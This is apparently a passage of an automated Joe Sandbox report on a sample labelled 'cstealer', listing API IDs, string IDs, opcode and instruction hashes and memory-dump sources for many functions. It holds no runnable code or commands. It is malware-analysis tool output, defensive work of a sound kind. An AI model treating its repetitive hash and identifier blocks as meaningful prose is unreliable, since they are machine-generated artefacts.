                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                            • Instruction Fuzzy Hash: 2931E531312780D1EF22DB86A4007E4B6D6B788BB2F6909269F1D077F0DF39D0559380
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction ID: 1aa93f5abaab6b74eded6f4e74b46d0ef2a397ff28059eb80c4b1362f4119006
                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction Fuzzy Hash: 33116D32314B8186E7508B5AE844399B6E1F788FF6F044625EF5A977B4CF38C8149784
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction ID: 96fdb32f101d79e0954fc04ddf2fd04eeb2a99bfb01801c590f308f84dfbd4ba
                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction Fuzzy Hash: 29319D32701B9183EB14CF96A5407A9F7E2FB54BA6F0844209F4847B76EF34C4A1E380
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction ID: 30ed924f9fdae6f10bd022f2da53b65c48ffbd97723172bdc2ce23c4406712fc
                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction Fuzzy Hash: E1118C303003D442FB68A3B165413E9F2C37B947F6F144725AB3646BF6DE68C412A380
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction ID: fe82c0c6f41f647c9aad2e1a40446b8e12027783ce5f043a3070cd7e307fa92f
                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction Fuzzy Hash: C3015B71300B8086EB14DB56E448399B3E2F788FD2F484435DF4953764DE38C549C784
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction ID: 613acb7e71fb28a53e36258562618e046d996cba38d0e1d0002172a6b552a072
                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction Fuzzy Hash: FD012D75315B8086EB249B65E848795B3F2BB49BA7F040824CF4917775EF3DC108D784
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction ID: ee186761fd281947b45537d140527ae6652558dafecc921b8ffaf79919fc35af
                                                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction Fuzzy Hash: 9851D3323057808AEF54CF55E848B99B7D7F384BAAF208528DF4653768DB35E841E784
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction ID: 0ce47e0e8d0f8edba1b9f6802766db3d122c0766496499b6eed022fd588fbfa7
                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction Fuzzy Hash: C9F0627121178481EB108B68E848399B3E2FB84BB2F540619CB6A457F4CF2CC1459784
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction ID: fcf3f87a22714c5af5c7dd3b874ef1164f8a65ec843021e3acb372931e6fbf07
                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction Fuzzy Hash: 8CF08230708BC482EA008B57B904199F2E2BB48FE2F084530EF4617B38DF3CC4459748
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction ID: 59b4f285aac9e59584851de5800f30632ac4240fb03ada94efefb7bb0b434042
                                                                                                                                                            • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction Fuzzy Hash: 4F61C436619B80C6E760DB55E45039AB7F2F3887A6F504116EB8E47BB8DB7CC480DB80
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: 3b7b3c2f61e4c674145346ebd926115f83d3f6aa4737f228916995deec1bfdb4
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 54119132A1CBD111FA641529F4413E9B1D37B5D3F6F588629EB6E07FFE8A24C8416280
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: cc1465b818a63f9f29368bfd64e07edbab82b2e5aca521e11524367ea61b8342
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: 2B117BB2B10BD112F664155CDB653E5B1C37B783BAF180E24A776277F6C624C441A180
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction ID: 5c58eaf62982e4e61320bef0ad0a9ad46b6bed5caea801ba4d6ea43779995cc0
                                                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                                            • Instruction Fuzzy Hash: C16192766003C042FB659B65D5C43EAFAE3F7867A2F548495CB0A577B8FA34C841B290
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction ID: 80cf88362f66d50eb35710a0319643d093fab15a29c8e9ca8c2fa1e16ef440d4
                                                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                                            • Instruction Fuzzy Hash: 33617732600B848AEB60DFA5D4803DDB7E2F358BA9F144215EF4A17BA8DF38D595D780
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: 21f12910204a0d017a884d9ceef6c09780b78ba4c24cace68260204c25c92d2f
                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: 535181321003C0CAEBB48B15948639CB7E2F355FAAF188155DB5987BE6EB78D451F780
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction ID: 9e4c6edbbce038bc63e31416fd91147808476041fdd0b79cb1016711f7bb55d0
                                                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                                            • Instruction Fuzzy Hash: 65517E721007C08BEBB48F959484399B7E2F764FA6F188125DB9947BE5CF38D4A1E780
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 3242871069-629598281
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: ierarchy Descriptor'$riptor at (
• API String ID: 592178966-758928094
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2570729558.0000014E71250000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E71250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71250000_cstealer.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
APIs
Memory Dump Source
• Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
                                                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction ID: 8dda2a4e53c2db225312249758e77918bd949882e7ddcf4e576b0143183d4cd1
                                                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                            • Instruction Fuzzy Hash: 87115135701B8485EB54DBAAA4042A9B7E2FB89FE2F184025DF4D577B5DF38C442E380
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction ID: 343b61533e16397f4571d681332592e41e582bd085240413369920d3bfdaa2c6
                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                            • Instruction Fuzzy Hash: DCE06DB560174486EB048F66D80838AB6E2FB89F66F04C424CA0907371DF7DC499D790
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223141429.00007FF8A8F28000.00000080.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8950000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2222072647.00007FF8A8950000.00000002.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8951000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8BEA000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8C64000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8CA6000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8CCB000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8D65000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8D68000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8E70000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8EB0000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8EBA000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2222098181.00007FF8A8F1C000.00000040.00000001.01000000.0000001A.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223199273.00007FF8A8F2A000.00000004.00000001.01000000.0000001A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8a8950000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3300690313-0
                                                                                                                                                            • Opcode ID: 438a066e7f02bf6167b00439c69f910427746ba9370289bb30125fdead0934cc
                                                                                                                                                            • Instruction ID: f1256c6b2f126d472d8da2b57a6ea5c00f85ce7e2423ee4bdc7cbb3943cdd420
                                                                                                                                                            • Opcode Fuzzy Hash: 438a066e7f02bf6167b00439c69f910427746ba9370289bb30125fdead0934cc
                                                                                                                                                            • Instruction Fuzzy Hash: 0362333262919696E719CE38E8002BD76A0FB587D5F045132EA9EC37C8FB3CEA55C714

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                            • API String ID: 2943138195-1482988683
                                                                                                                                                            • Opcode ID: 8198320b206939844f23122dd5e90657888558fff071462cdecbe7f68ee38a4c
                                                                                                                                                            • Instruction ID: d8467c640b073ad24f348808adc1b0605217cc1621b309f08bc183a14ea13b13
                                                                                                                                                            • Opcode Fuzzy Hash: 8198320b206939844f23122dd5e90657888558fff071462cdecbe7f68ee38a4c
                                                                                                                                                            • Instruction Fuzzy Hash: 2F025A72E1865388FB28CB6CD8951BC2BB0BB05BC4F8451B9DF0D16A98DF2DE544E340

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ff8ba240000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                            • String ID: `anonymous namespace'
                                                                                                                                                            • API String ID: 3863519203-3062148218
                                                                                                                                                            • Opcode ID: 0934691313692e0f7ca743a959aac5446240169abf1b8922f93b005b9bcd56c4
                                                                                                                                                            • Instruction ID: 781a46ac45301f92a69167545697144ad5286c2147c5f6e62f1975663d9b10e3
                                                                                                                                                            • Opcode Fuzzy Hash: 0934691313692e0f7ca743a959aac5446240169abf1b8922f93b005b9bcd56c4
                                                                                                                                                            • Instruction Fuzzy Hash: 08E14872A18B8299EB10CF2CD9801AD7BA0FB44B88F4491B6EF5D17B95DF38E554E700

                                                                                                                                                            Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2223544157.00007FF8BA241000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8BA240000, based on PE: true
• Associated: 00000008.00000002.2223330702.00007FF8BA240000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2223968322.00007FF8BA251000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224191632.00007FF8BA256000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000008.00000002.2224695908.00007FF8BA257000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
